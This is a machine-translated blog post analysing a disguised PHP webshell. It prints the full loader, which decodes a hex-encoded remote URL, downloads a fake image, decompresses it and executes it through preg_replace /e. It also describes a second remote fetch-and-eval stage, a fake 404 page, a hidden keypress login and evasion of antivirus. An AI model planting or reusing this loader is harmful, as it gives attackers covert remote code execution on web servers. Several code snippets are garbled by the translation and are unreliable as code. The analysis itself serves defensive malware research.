PHP Backdoor New gameplay: a wretched PHP backdoor analysis

0x00 background

Recently, 360 Web site defender Security team recently captured a PHP-based implementation of the Webshell sample, its clever code dynamic generation way, wretched self-page camouflage technique, let us in the process of analyzing this sample to feel a lot of fun. Next, let's share the wonderful Webshell.

0x01 Details

The Webshell code is as follows:

<?PHPerror_reporting(0);Session_Start();Header("Content-type:text/html;charset=utf-8");if(Empty($_session[' API ']))$_session[' API ']=substr(file_get_contents(sprintf('%s?%s ',Pack("h*", '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ())), 3649); Preg_replace ("~ (. *) ~ies", Gzuncompress ($_session[' API ']), null);? >

The key to look at the following line of code,

sprintf ('%s?%s ',pack("h*", ' 687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ())

After executing here is actually a picture, the decrypted picture address is as follows:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

Then call the File_get_contents function to read the picture as a string, and then substr take 3649 bytes after the content, then call Gzuncompress decompression, get the real code. Finally, the Preg_replace modifier e is called to execute the malicious code. Here, execute the following statement to restore the malicious sample code,

<? PHP Echo gzuncompress (substr(file_get_contents(sprintf('%s?%s ',pack("h*", '  687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′), Uniqid ())), 3649));? >

：

Analysis of this code, found that this is a disguised 404 Trojan (here is really too wretched ...) Change the page title to 404 Not Found), in fact, the entire Webshell a class plus three function, such as:

First I first look at its front-end HTML code, which has such a section of JS program

function (e) {var theevent = window.event | | e; var code = Theevent.keycode | | Theevent. which; if (+ = = code) {$ ("login"). Style.display = "Block"}}

Here it uses Document.onkeydown to get the user to hit the keyboard event, when code equals 80 display Login This div, here Query the KeyCode table, find 80 corresponding p and p key

So trigger Webshell landing need to press the P key (do not press the P key page is a blank page, do not see the login box):

Back to the server PHP code, you can see the program is symmetric encryption, and the login password as the encryption key, code:

And look at the logic of Init ().

, look at this code first

$true = @gzuncompress(gzuncompress(Crypt::d ecrypt (pack(' h* ', ' 789c63ac0bbec7b494f12cdb02f6dfac3f833731cf093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59′), $_POST[' key'], true));

According to this decryption logic we can launch, here is actually the string true to do the following encryption processing,

Unpack (' h* ',Crypt:: Encrypt (gzcompress(gzcompress$_posttrue))

So when the correct password is entered @gzuncompress return the string true, then the program calls Setcookie to the client to return $_cookie[' key ', and then it is worth mentioning that the following exit(‘{"status":"on"}‘) , where it is closely related to the front-end code, We look at the front end with a callback function, as follows

function Callback () {vareval("(" + This.responsetext + ")"); if (json.status== ' on ') {Windows. Location. reload (); return ;} if (JSON. notice) {$ ("notice"). Style.display = "Block"; $ ("notice"). InnerHTML = json. notice;sideout ();}}

The execution here exit(‘{"status":"on"}‘) returns the JSON string {"status":"on"} , when the front-end JS Code classback () gets to this response to perform a window.location.reload () refresh, and again requests exactly the cookie that was obtained earlier, Then execute the logic that determines the cookie:

This is the same as the previous post logic, the following when judged to be ' true ', here again request a picture, pack out the address for http://2012heike.googlecode.com/svn/trunk/code.jpg , and then call _request get the picture content, decryption decompression and then Eval, After analysis, it is found that code.jpg is the real Webshell after the encrypted compression of the content. Here I followed the code to print out the content of the really executed Webshell:

After the successful landing Webshell such as:

0x02 Summary

This is a highly covert webshell, which does not use some dangerous functions and sensitive words in its code, but instead saves the real shell content after layers of encryption to the image, leaving only a URL on the server, and the URL is encrypted. So there is no external view of any features can be found, over the majority of the WAF and kill the soft Avira. The author's use of new ideas, and the front end of the combination of close, code simplification, a variety of artifice, different from the common Webshell back door, it is admirable!

From:http://blog.wangzhan.360.cn/?p=65

PHP Backdoor New gameplay: a wretched PHP backdoor analysis